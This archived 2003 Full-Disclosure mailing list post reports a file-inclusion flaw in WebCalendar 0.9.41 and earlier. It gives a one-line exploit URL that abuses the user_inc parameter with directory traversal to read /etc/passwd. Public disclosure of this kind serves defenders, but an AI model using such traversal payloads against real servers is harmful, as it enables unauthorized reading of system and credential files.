[Full-Disclosure] WebCalendar Include File

From: noconflic (nocon_at_texas-shooters.com)
Date: 07/21/03

  • Next message: madsaxon: "RE: [Full-Disclosure] Microsoft wins Homeland Security Bid ( Reuters)" 
    To: full-disclosure@lists.netsys.com
Date: Sun, 20 Jul 2003 20:20:15 -0500

    Webcalendar 0.9.41 and below.
    http://webcalendar.sourceforge.net/

      Since this appears to be public info now.

    Problem:
      http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588

    Exploit:
      http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../etc/passwd

    - nocon
    http://nocon.darkflame.net/
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: madsaxon: "RE: [Full-Disclosure] Microsoft wins Homeland Security Bid ( Reuters)"

    Relevant Pages

    • Re: [Full-disclosure] Am I missing anything ?
      ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
      (Full-Disclosure)
    • Re: [Full-disclosure] List of Fuzzers
      ... int authenticate(char* username, char* password) { ... that fuzzing has its limitations (that can be fixed and applied like ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
      (Full-Disclosure)
    • Re: [Full-disclosure] List of Fuzzers
      ... valid to use someone else's fuzzing framework against one's own ... I see "Which fuzzer on this list will help me find the most ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
      (Full-Disclosure)
    • Re: [Full-disclosure] List of Fuzzers
      ... valid to use someone else's fuzzing framework against one's own ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
      (Full-Disclosure)
    • [Full-disclosure] List Charter
      ... This document serves as a charter for the [Full-Disclosure] mailing ... Typically posting will be ... members may be removed from the list by the management. ...
      (Full-Disclosure)